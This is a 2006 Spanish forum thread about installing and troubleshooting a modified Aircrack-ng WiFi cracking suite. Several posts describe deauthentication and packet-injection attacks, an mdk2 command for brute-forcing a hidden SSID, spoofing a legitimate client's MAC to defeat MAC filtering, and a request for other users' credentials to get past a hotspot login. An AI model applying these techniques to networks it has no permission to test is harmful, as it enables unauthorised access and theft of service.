Hola a tod@s.Todo esto que estais contando es para redes que estan encriptadas no?? Yo detecto una red que no tiene encriptacion pero a la hora de acceder a internet, abro el firefox y me sale una pagina donde tengo que poner un usuario y una contraseña. Alguien sabe como puedo conseguir los datos de otro usuario para poder acceder a internet??? (no tengo mucha idea del tema) o si hay alguna otra forma de hacerlo???

Creo que lo mas dificil que es lo de la encriptacion esta resuelto.

Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: pianista en 4 Noviembre 2006, 17:57 pm
Eso que te pasa es un hostspot, mira un post que hay de hace tiempo de nil0pointer o de thefkboss ya no me acuerdo en el que explicaban como saltarlo....
Saludosss


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: LMF7 en 4 Noviembre 2006, 18:12 pm
busco hostpot y no me encuentra nada.ire mirando uno por uno
Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: epidemya en 4 Noviembre 2006, 23:26 pm
Gracias por responderme tan rápido (Pianista, rh3nt0n), hago lo que me decis. He empezado desde el principio, he borrado el he formateado memoria USB, he arrancado de nuevo la Live CD del Hax-puppy, he creado el pup001 en la memoria USB, he metido el archivo usr_devx.sfs en la raiz como se indica, de la memoria USB cojo el archivo tar del aircarck motherfucker 0.8(bajado con windows) lo coloco en home, y alli ejecuto el tar -zxvf  .....tar
cd aircrag-ng.......
make clean
make
sudo make install

al llegar aqui me sale el siguiente error
sudo: can't start /etc/sudoers: No such file or directory
Broken pipe
Sigue funcionanddo con
./aircrack-ng
pero solo desde el directorio donde se emncuentra la aplicación.
Alguna idea nueva???
Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: longits en 5 Noviembre 2006, 00:13 am
Bueno, a mi también me pasa lo mismo que a ti epidemya, y lo que hago es abrir las xterm desde ese directorio del aircrack, pulsando el boton derecho del raton --> Xterm here.

Es algo coñazo, pero bueno, funciona perfecta e exactamente igual.

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: epidemya en 5 Noviembre 2006, 03:00 am
Citar
[Sigue funcionanddo con
./aircrack-ng
pero solo desde el directorio donde se emncuentra la aplicación.
Alguna idea nueva???
/quote]
Me respondo yo solito, ejecutando echo $PATH ves las rutas, que estan definidas, en todas ellas buscara por defecto las aplicaciones, en Hax-puppy poniendo los nuevos progrmas en my-aplications/bin los encuentra sin ningun problema. Todo es investigar, leer y preguntar, de una cosa vas a la otra y al final  :D


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: pianista en 5 Noviembre 2006, 16:35 pm
Aqui tienes lo del hotspot http://foro.elhacker.net/index.php/topic,127534.0.htmlSaludosss


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: LMF7 en 5 Noviembre 2006, 21:13 pm
Gracias pianista. Lo he probado y ha funcionado bien lo del Hotspot.
Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: biker en 6 Noviembre 2006, 00:13 am
Hola, antes de nada felicitar a thefkboss por estas versiones tan peculiares, que tienen utilidades muy prácticas ;D

No śe muy bien si la versión de esta suite de ahora también implementa un parche para que aireplay-ng se vuelva a abrir solo e intente volver a asociarse, pero lo cierto es que hay una red que de vez en cuando me lanza algún mensaje "Got a deauthication packet!" (o como se escriba eso de desautenticación) con el ataque 2. Y la cosa es que lo mismo dejo aireplay-ng con este ataque 4horas, y cuando vuelvo sigue haciendo sus asociaciones, a pesar de ese mensaje de de vez en cuando, que lo mismo lo tengo 15 minutos y se me ha salido del ataque y me ha puesto lo de que compruebe que no estoy muy lejos ni muy cerca, que pueda inyectar, que tal, q cual...

Cuando me encuentro esta situación, airodump-ng sigue capturando paquetes tan tranquilo, y claro, el ataque 3 se me ha quedado lanzándome el mensaje de que mire a ver si está asociado el cliente... normal. Entonces lo que he hecho ahora es usar directamente para la autenticación falsa la versión 2.41 traducida por Uxio, que si se sale ella solita vuelve a entrar. Mi duda es si debería de desistir con esa red, usar aireplay 2.41 parcheado o es alguna otra cosa :huh:

PD: mi interfaz es una USB con chipset rt2570 en un Linux con núcleo 2.6.17, sin SMP ni PREEMPT activados.

Un saludo a todos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 11 Noviembre 2006, 05:52 am
Thefkboss me decias que el afrag lleva un makefile para instalarlo....bueno pues lo he instalao y no me rulaba.....lo volvere a probar a ver.........quiero decir que se instala way y el afrag tira....pero se queda off.....mañana lo pruebo y te confirmo

en cuanto al mdk2,  funciona para todo tipo de cifrados? me refiero que si valdria para WPA tb......

Codigo
Citar
mdk2 rausb0 p -b a  -t 00:14:BF:EE:AA:EE -s 100
y me devuelve esto.....

Citar
SSID Bruteforce Mode activated!

Waiting for beacon frame from victim...
Sniffer thread started
Got response from 00:14:BF:00:00:00, SSID: "*dudux"

Got response from 00:04:E2:01:01:00, SSID: "SMC"

Got response from 00:04:E2:01:61:f4, SSID: "SMC"

Got response from 00:04:E2:DE:D1:E3, SSID: "SMC"





Por lo que dice parece que con un beacon le basta....para empezar....es necesario algun data??
cuanto puede tardar?
es correcta la salida del mdk2? me parece un poco rara...
me imaginaba algo parecido al weplab,que ves como prueba caracter a caracter..........


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 11 Noviembre 2006, 21:04 pm
pues no se xq se queda off?????ni idea
en cuanto al mdk2 si q funciona para WPA xq lleva el parche implementado.

pues no con los beacons le vastan a ver lo q hace con los beacons es comprobar la longitud del SSID para hacer la planificar con cuantos caracteres va a takar.
y luego lo q hace es hacer un atake tipo envio de arp variando las ssid asi q es rapido (no es asi exactamente...)
por eso lo de -s 100 son 100 paquetes por segundo asi q este valor lo podemos incrementar hasta q te de fallo no se en cuanto esta el maximo no me acuerdo depende de cada tarjeta q te permita mas o menos ademas del codigo de programacion esta claro.

Cuanto puede tardar pues depende de la longitud del SSID y de los paquetes por segundo q envies y de si solo son minusculas....o son todo variado..pero vamos es rapido de cojones.

la salida es correcta vamos esos q aparcen ahi es xq no tiene el SSID oculto me imagino????no????.

Cosa importante si hay FILTRADO MAC pues ya sabes cliente legitimo es decir cambiate la mac de tu tarejta xq si no te va a decir q nanai


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 11 Noviembre 2006, 23:25 pm
Citar
por eso lo de -s 100 son 100 paquetes por segundo asi q este valor lo podemos incrementar hasta q te de fallo no se en cuanto esta el maximo no me acuerdo depende de cada tarjeta q te permita mas o menos ademas del codigo de programacion esta claro.

probare a incrementar el -s ,,,,,,la verdad que ultimamente estoy usando bastante 2 a la vez,,,, ath0 y rausb0....probare las 2


Citar
Cuanto puede tardar pues depende de la longitud del SSID y de los paquetes por segundo q envies y de si solo son minusculas....o son todo variado..pero vamos es rapido de cojones.

pues tio son 4 digitos.... le puse el parametro -a para todo tipo de caracteres esperando que la sacara en un pedo....pero solo aparecen las redes que no lo tienen oculto,,,,lo deje 2 h y algo y nada.....probare incrementar el numero de paquetes

esta es WPA,pero de las nuevas,es decir WPA2...Imagino que tambien.no?


Citar
la salida es correcta vamos esos q aparcen ahi es xq no tiene el SSID oculto me imagino????no????.

exacto,pero que raro mme parece.....


Citar
Cosa importante si hay FILTRADO MAC pues ya sabes cliente legitimo es decir cambiate la mac de tu tarejta xq si no te va a decir q nanai

no he probado un A1 para darme cuenta que tiene filtrado,,,aunque no creo,,,pq sino menuda protección!!!!
essid oculto + WPA2 + Filtrado MAC 
:-(




Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: Hwagm en 11 Noviembre 2006, 23:44 pm
http://hwagm.elhacker.net/htm/aircrack-mf.htm


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: pianista en 12 Noviembre 2006, 17:33 pm
Genial ese post Hwagm, genial el manual ;)
Saludoss


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 12 Noviembre 2006, 21:23 pm
ostias pues WPA2 ahora no estoy seguro?????tengo q mirar el codigo xq WPA si pero WPA2 ni idea


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 12 Noviembre 2006, 23:49 pm
tranki thefkboss.....es la unica que tengo el essid oculto.....y es WPA2.........de 4 digitos......

si puedes miralo


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: Etal en 13 Noviembre 2006, 18:25 pm
Hola  , tengo dudas ,  tengo una linksys con chipset broadcom bcm4306 ,  entonces  tengo tambien el livecd del backtrack 2 ,  lo que hago es  ponerl el backterack , ya una vez logeado ,  inserto  los drivers del bcm43xx y el firmware   despues de esto lo doy de alta en el kernel 2.6.18 del backtrack 2 ,  deespues le doy make y make modules?install   y despues de 2 hrs que dura esto pues le doy  modprobe bcm43xx  y me da prompt asi que sirvbe despues doy ifconfig eth0 up
despues le doy iwconfig y mi tarjeta aprece en  eth1  despues de esto , le doy ifconfig eth1 down despues macchanger -m 00:11:22:33:44:55   eth1    bueno... pero con la mac de un cliente conectado a  el apn que quiero
despues de esto   saco del aircrack motherfucker el archivo zipeado que esta en  una carpeta que es el aireplay pero para las broadcom el aireplay-ng.c  y lo coloco     ... despues de esto hago un make y un make install despues de esto ejecuto  el airdump   para que me capte señales y capta pocas...  pero en la de clientes conectados me marca   2 clientes no asociados y  tambien  1 cliente asociado pero solo en ratos ,  despues de esto  lo que hago es poner el aireplay   y le doy para un atake deauth  ya con su bssid despues pongo  la mac del apn despues  la del cliente conectado  y pues la eth1  , despues de esto mando paquetes  con el comando de arprepay ,  y me los manda   pero no logro que  capture muchos paquetes rapidamente.... no marca ningun error pero cuando lo hago no pasa nada en el airodump , es como si no hubiese ejecutado la inyeccion , que puede estar pasando ?????


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 15 Noviembre 2006, 12:19 pm
te falta patchear el driver para que inyecte , y no es algo trivial .. aunke tampoco es trivial , levantar un modulo como el de este dispositivo en back|track y hacerlo monitorizar ... asi que ...
echale un vistazo a esto :
http://foro.elhacker.net/index.php/topic,144540.0.html

igual te sirve de algo ..

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: Etal en 15 Noviembre 2006, 16:59 pm
No , de hecho ya lo parchee   y me salen los mismos errores que a el usuario que le dieron instrucciones en el otro tema , y  cuando instalo el aircrack y hago el make en una carpeta en mi usb    me deja parchearlo solo si  le doy esta opcion

-i

con esa me devuelve el prompt sin error }
pero a la hora de ejecutar el airdump me salen movidas las lineas por decir

2wire232   2
essid        packets
 
osea ya no me salen en su lugar ,  me salen arriba .... y nio hablar de aireplay que no me deja ejecutarlo ... si nadamas doy aireplay-ng .... ya sabes tira el rolllo de loscomandos ...pero ya con las opciones para  efectuar el ataque  uno me marca un error de el archivo segun . . .  que hice mal ???

y por que no me deja parchearlo en las carpetas que se instalo ??


patching file bcm43xx_main.c
Hunk #1 succeeded at 99 (offset -5 lines).
Hunk #2 FAILED at 3160.
Hunk #3 FAILED at 3272.
Hunk #4 succeeded at 4156 (offset 607 lines).
2 out of 4 hunks FAILED -- saving rejects to file bcm43xx_main.c.rej

pero eso si ... me deja ponerla en modo monitor , cambiar mac ...pero de nada sirve ... si no me deja conectarme  para tratar de ejecutar el atake



y en el otro tema ..ahi hablan de parchar el kernel....  yo tengo el 2.6.18 ---- necesito parchearlo ??? ya tiene los drivers del bcm43xx solo  enttre a menuconfig y los puse y  compile y nada sirve  . . . podrias explicarme mas al respecto ya que dices que no es trivial . . . pero creo que  en esto soy un ignorante 


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: zepo en 15 Noviembre 2006, 23:56 pm
Hola a todos soy nuevo, hace poco me baje la distro Hax puppy 1.3 (que es la caña), me lei un monton de cosas (yo no habia visto linux nunca), y todo me ha ido bastante bien (aunque soy torpe para la informatica).
Ahora me gustaria actualizar el aircrack de esta distro a la version
motherfucker edition 0.8. Alguien me puede explicar como hacerlo. He estado mirando por aqui: h**p://hwagm.elhacker.net, pero no me aclaro.
Mi tarjeta es una proxim orinoco 8470wd.
please, alguien que me ayude??que me explique como hacerlo paso a paso (pa torpes)??
1 salu2. a todos


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 16 Noviembre 2006, 00:57 am
tan sencillo como hacerse un script que lo haga el solo.......para que esto te funcione tendras que tener internet......sino bajatelo y haz los pasos menos el de wget

abre un terminal y ejecuta esto

#nano /root/aircrack-ng.txt

aqui pegas estas lineas........

Citar
wget http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz
tar -zxvf aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz
cd aircrack-ng-0.6_motherfucker_edition_0.8
make && make install


lo grabas con ctrl+o

te vas a /root/ y le das permisos al script

#chmod 777 aircrack-ng


ejecutas el script

#./aircrack-ng


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: zepo en 16 Noviembre 2006, 02:57 am
tan sencillo como hacerse un script que lo haga el solo.......para que esto te funcione tendras que tener internet......sino bajatelo y haz los pasos menos el de wget

abre un terminal y ejecuta esto

#nano /root/aircrack-ng.txt

aqui pegas estas lineas........

Citar
wget http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz
tar -zxvf aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz
cd aircrack-ng-0.6_motherfucker_edition_0.8
make && make install


lo grabas con ctrl+o

te vas a /root/ y le das permisos al script

#chmod 777 aircrack-ng


ejecutas el script

#./aircrack-ng

Muchas gracias por contestarme, he hecho lo que decias pero no me rula; te cuento lo que me pasa:

1.- despues de ejecutar el script, al poner en la consola aircrack-ng ya lo reconoce, pero cuando pongo airodump-ng o el aireplay-ng no.
2.- cuando reinicio el hax puppy se borra todo lo que habia en la carpeta root, es decir el archivo aircrack-ng-0.6_motherfucker_edition_0.8.tar.gz, la carpeta donde esta descomprimido, y el script que he creado. Tengo el Hax puppy instalado en el disco duro C:\ y puesto en el raiz el archivo "usr_devx.sfs" que supongo que sera para poder agregar programas a la distro.

Sabes donde la estoy cagando????


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 16 Noviembre 2006, 14:04 pm
te falla el make???? es la ultima instruccion y la encargada de instalar todo y compilarlo en el kernel.........

es muy raro que solo te haya instalao en aircrack-ng,y no los demas....porque son 4 o 5 en la suite....... no te ha dado errores el script??


si lo tienes instalao pq se te borran las cosas????? :huh:


pega la salida del script,,haber si podemos ver algo más.....pq con lo que cuentas me quedo =....... :huh:


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: zepo en 17 Noviembre 2006, 15:04 pm
Ya se ha solucionado lo que se borraba, era que el hax puppy estaba en modo lectura (y entonces claro se borraba todo al reiniciar, que torpe que soy!). En cuanto a que no me funcionan el airodump-ng y el aireplay-ng sigo gual. Te mando la salida del make, y es un buen tocho!:

aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/madwifi-ng-r1486.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/madwifi-ng-r1475_disable_retry_raw.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/madwifi-ng-r1457-1473_disable_retry_raw.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/madwifi-cvs-20051025.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/madwifi-cvs-20050814.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/madwifi-cvs-20050707.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/hostap-driver-0.4.5.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/old/hostap-driver-0.3.9.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/wlanng-0.2.1-pre26.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/rtl8180-0.21.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/prism54-svn-20050724.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/madwifi-old-r1417.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/madwifi-ng-r1730.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/linux-wlan-0.2.3.packet.injection.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/ipw2200-1.1.4-inject.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/ipw2200-1.1.3-inject.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/hostap-kernel-2.6.16.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/hostap-driver-0.4.7.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/bcm43xx_old.patch
aircrack-ng-0.6_motherfucker_edition_0.8/patches/bcm43xx_new.patch
aircrack-ng-0.6_motherfucker_edition_0.8/src/version.h
aircrack-ng-0.6_motherfucker_edition_0.8/src/uniqueiv.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/udpserv.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/sha1-mmx.S
aircrack-ng-0.6_motherfucker_edition_0.8/src/pcap.h
aircrack-ng-0.6_motherfucker_edition_0.8/src/packetforge-ng.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/kstats.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/kismet.conf~
aircrack-ng-0.6_motherfucker_edition_0.8/src/ivstools.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/crypto.h
aircrack-ng-0.6_motherfucker_edition_0.8/src/crypto.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/crctable.h
aircrack-ng-0.6_motherfucker_edition_0.8/src/crc.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/common.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/arpforge-ng.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/airodump-ng.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/aireplay-ng.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/aireplay-ng(para broadcom bcm43xx).zip
aircrack-ng-0.6_motherfucker_edition_0.8/src/airdecap-ng.c
aircrack-ng-0.6_motherfucker_edition_0.8/src/aircrack-ng.c
aircrack-ng-0.6_motherfucker_edition_0.8/test/wpa2.eapol.cap
aircrack-ng-0.6_motherfucker_edition_0.8/test/wpa.cap
aircrack-ng-0.6_motherfucker_edition_0.8/test/password.lst
aircrack-ng-0.6_motherfucker_edition_0.8/test/makeivs.c
aircrack-ng-0.6_motherfucker_edition_0.8/VERSION
aircrack-ng-0.6_motherfucker_edition_0.8/README
aircrack-ng-0.6_motherfucker_edition_0.8/Makefile.other
aircrack-ng-0.6_motherfucker_edition_0.8/Makefile.osx
aircrack-ng-0.6_motherfucker_edition_0.8/Makefile.cygwin
aircrack-ng-0.6_motherfucker_edition_0.8/Makefile
aircrack-ng-0.6_motherfucker_edition_0.8/LICENSE
aircrack-ng-0.6_motherfucker_edition_0.8/INSTALL
aircrack-ng-0.6_motherfucker_edition_0.8/ChangeLog
aircrack-ng-0.6_motherfucker_edition_0.8/AUTHORS
aircrack-ng-0.6_motherfucker_edition_0.8/airmon-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/aircrack-ng.c src/crypto.c src/sha1-mmx.S src/common.c -o aircrack-ng -lpthread
src/aircrack-ng.c: In function `do_wpa_crack':
src/aircrack-ng.c:2496: warning: `i' might be used uninitialized in this function
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/airdecap-ng.c src/crypto.c src/common.c -o airdecap-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/arpforge-ng.c src/common.c -o arpforge-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/packetforge-ng.c src/crypto.c src/sha1-mmx.S src/common.c -o packetforge-ng -lpthread
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/aireplay-ng.c src/common.c -o aireplay-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/airodump-ng.c src/common.c -o airodump-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/ivstools.c src/common.c -o ivstools
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 src/kstats.c  -o kstats
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 test/makeivs.c -o makeivs
install -d /usr/local/bin
install -m 755 aircrack-ng airdecap-ng arpforge-ng packetforge-ng ivstools kstats /usr/local/bin
install -d /usr/local/sbin
install -m 755 aireplay-ng airodump-ng packetforge-ng  /usr/local/sbin
install -m 755 airmon-ng /usr/local/sbin
install -d /usr/local/man/man1
install -m 644 ./manpages/* /usr/local/man/man1


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 17 Noviembre 2006, 17:05 pm
parece que esta bien instalao......

introuce en /usr/bin y /usr/sbin los binarios.......
el gcc no da warnings ni errores.......

voy a reinstalarlo y comparo mi salida....


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: zepo en 17 Noviembre 2006, 18:21 pm
parece que esta bien instalao......

introuce en /usr/bin y /usr/sbin los binarios.......
el gcc no da warnings ni errores.......

voy a reinstalarlo y comparo mi salida....

Probado pero nada sigue igual, solo me funciona el aircrack-ng los demas nada. podria ser porque tengo que actulizar los drivers a los madwifi-ng? no se pregunto


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 17 Noviembre 2006, 18:47 pm
no no hari falta es decir te funcionaria igual.
q raro.....
has puesto bien airodump-ng y no airodump solo en el comando.????
nose q te puede pasar


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: zepo en 17 Noviembre 2006, 20:16 pm
no no hari falta es decir te funcionaria igual.
q raro.....
has puesto bien airodump-ng y no airodump solo en el comando.????
nose q te puede pasar
si pongo airodump-ng y aireplay-ng y no rulan, solo el aircrack-ng va; voy a reinstalar el hax puppy, a ver que pasa, pq si os funciona tiene que funcionaaarrr!! ahhrrr!!!
probare y cuento.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: zepo en 17 Noviembre 2006, 21:26 pm
ya me rula!! habia que copiar el contenido de usr\local\sbin a usr\local\bin y ya esta. Creo que esto era lo que decia *dudux, y lo que yo copie fue el contenido de la carpeta del
aircrack-ng-0.6_motherfucker_edition_0.8.
Muchas gracias por ayurdarme, sois unos maquinas!!
gracias.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 17 Noviembre 2006, 21:29 pm
ya me rula!! habia que copiar el contenido de usr\local\sbin a usr\local\bin y ya esta. Creo que esto era lo que decia *dudux, y lo que yo copie fue el contenido de la carpeta del
aircrack-ng-0.6_motherfucker_edition_0.8.
Muchas gracias por ayurdarme, sois unos maquinas!!
gracias.

se ve que te habia fallado eso,,,,algo habia visto .....
tu si que eres un makina,,, a disfrutar de suite
;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: HeLLCiTo en 20 Noviembre 2006, 23:08 pm
esto si es raro

Citar
aviso: el puntero que apunta en el paso del argumento 1 de ‘set_mac’ difiere en signo

tengo varios errores de estos del puntero y ya habia instalado anteriormente este aircrack sin problemas, tengo una atheros

luego instala bien, pero por ejemplo ya poniendola en modo monitor, bueno intentando

Citar
ioctl(SIOCSIWMODE) failed: Invalid argument
Error setting monitor mode on ath0

edit: he usado el buscador para esto ultimo y algo ha salido de reinstalar los drivers.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 21 Noviembre 2006, 01:34 am
Citar
Citar
ioctl(SIOCSIWMODE) failed: Invalid argument
Error setting monitor mode on ath0

edit: he usado el buscador para esto ultimo y algo ha salido de reinstalar los drivers.


para mi que son los drivers..........no te reconoce la ath0....

recompila los drivers de atheros haber si hay suerte........
;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: broko en 21 Noviembre 2006, 02:45 am
compadre este link no funciona http://hwagm.elhacker.net/descargas/linux4/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.2.zip


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 21 Noviembre 2006, 12:03 pm
esto si es raro

Citar
aviso: el puntero que apunta en el paso del argumento 1 de ‘set_mac’ difiere en signo

tengo varios errores de estos del puntero y ya habia instalado anteriormente este aircrack sin problemas, tengo una atheros

luego instala bien, pero por ejemplo ya poniendola en modo monitor, bueno intentando

Citar
ioctl(SIOCSIWMODE) failed: Invalid argument
Error setting monitor mode on ath0

edit: he usado el buscador para esto ultimo y algo ha salido de reinstalar los drivers.


abre una terminal teclea :
Código:
vi ath_monitor 

y copia y pega este texto pulsando antes 'i' para insertar texto en vi :

Código:
#!/bin/bash
# configuracion atheros modo monitor
sudo wlanconfig ath0 destroy
sudo modprobe -r ath_pci
sudo modprobe ath_pci autocreate=monitor
echo "Quieres lanzar airodump s/n?"
read respuesta
if [ $respuesta = s ];then
     sudo airodump-ng ath0
     else
     exit
fi

cuando lo hallas pegado , pulsa 'esc' y teclea ':x' y pulsas enter .
En la misma terminal haces lo siguiente:

Código:
sudo chmod u+x ath_monitor
sudo cp ath_monitor /bin

si usas una distribucion a la que tengas acceso a una terminal como root , las lineas que lleven 'sudo' se lo quitas .

ahora cada vez que insertes tu tarjeta atheros y quieras usarla en modo monitor solo tienes que ejecutar :

Código:
sudo ath_monitor  

y obtendras una salida como esta :
Código:
rh3nt0n@rh3nt0n-laptop:~$ sudo ath_monitor
Quieres lanzar airodump s/n?

si pulsas 's' y enter , lanzaras automaticamente airodump-ng , si pulsas 'n' el script acabara. pero ath seguira en modo monitor .

saludos




Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: HeLLCiTo en 21 Noviembre 2006, 13:00 pm
graciasss   rh3nt0n, esque creo que en la ultima version de madwifi todo eso cambia un poco. A ver si me leo algo de documentación en su wiki

Lo de los punteros tambien fallo al  make del mdk2, pero luego en el make install lo hizo  tb sin problemas, por ahora no he encontrado ningun fallito en los programas, pero bueno.


Las novededades de esta ultima version 0.8 y ultima de ng todavia no las he testeado mucho, pero me soprende que el airodump, muestra los aps, de una forma mas incomoda a la vista, al menos para mi, cada dos lineas con lo de bssid arriba, nose...

el mdk2 hay que poner la longitud que te detecta el airodump, pero tengo dos , y a ninguna de ellas le marga longitud, ambas marca 0


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 21 Noviembre 2006, 14:04 pm
graciasss   rh3nt0n, esque creo que en la ultima version de madwifi todo eso cambia un poco. A ver si me leo algo de documentación en su wiki

es precisamente por eso " que cambia un poco" el hecho de destruirla y crearla directamente en modo monitor , yo estoy usando los ultimos madwifi-ng, patcheados y el script funciona sin problemas , pruebalo ;)

Lo de los punteros tambien fallo al  make del mdk2, pero luego en el make install lo hizo  tb sin problemas, por ahora no he encontrado ningun fallito en los programas, pero bueno.

respecto a los 'warnings' al compilar .. me temo que estos 'desarrolladores' programan a capon ..


Las novededades de esta ultima version 0.8 y ultima de ng todavia no las he testeado mucho, pero me soprende que el airodump, muestra los aps, de una forma mas incomoda a la vista, al menos para mi, cada dos lineas con lo de bssid arriba, nose...

a mi tambien me parece incomodo este aspecto , prefiero la 07 precisamente por esto .

el mdk2 hay que poner la longitud que te detecta el airodump, pero tengo dos , y a ninguna de ellas le marga longitud, ambas marca 0


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: juanjo4x4 en 21 Noviembre 2006, 14:12 pm
Me da este mensaje de error:
sudo ./airmon-ng  start eth2
-e
usage: airmon-ng <start|stop> <interface> [channel]

-e Interface    Chipset         Driver

./airmon-ng: 17: Syntax error: "(" unexpected

Uso Kubuntu 6.10 Edgy para AMD64
kernel 2.6.17-10-generic
la tarjeta inalambrica es una broadcom con chip 4306
driver bcm43xx sin parchear

No dio problemas al compilar el MF 0.8


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: rh3nt0n en 21 Noviembre 2006, 14:40 pm
usa
iwconfig eth2 mode monitor


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 21 Noviembre 2006, 15:10 pm
voy a mirara eso de q os aparece dos lineas pensaba q lo habia solucionado pero debe ser q no.
ya me di cuenta cuando me lo enseñastes rh3nt0n  en tu ordenador.
es debido a la resolucion de pantalla y a la resolucion de tamaño del shell. tambien de la panatalla q tengais ya q al haber tanta informacion si no lo poneis en el maximo tamañao posible se crearan 2 lines.
Yo lo probe en mi ordenador(PANTALLA 17 PULGA) y me iva bien no se ivan las lineas pero lo miro este finde y si eso lo intento corregir.


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: *dudux en 21 Noviembre 2006, 18:14 pm
estais hablando del aerodump del MFE....pues la verdad que raya un poco....he probado la configuracion maxima de pantalla con los mismos resultados.......dos lineas por MAC.......dos repetidas..
La verdad que mejoraria mucho si se configurara bien por defecto......

pa cuando la 0.9?? ;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.8 (ya disponible)
Publicado por: thefkboss en 21 Noviembre 2006, 20:35 pm
Citar
pa cuando la 0.9??
pues en cuanto saquen algo nuevo lo añado.
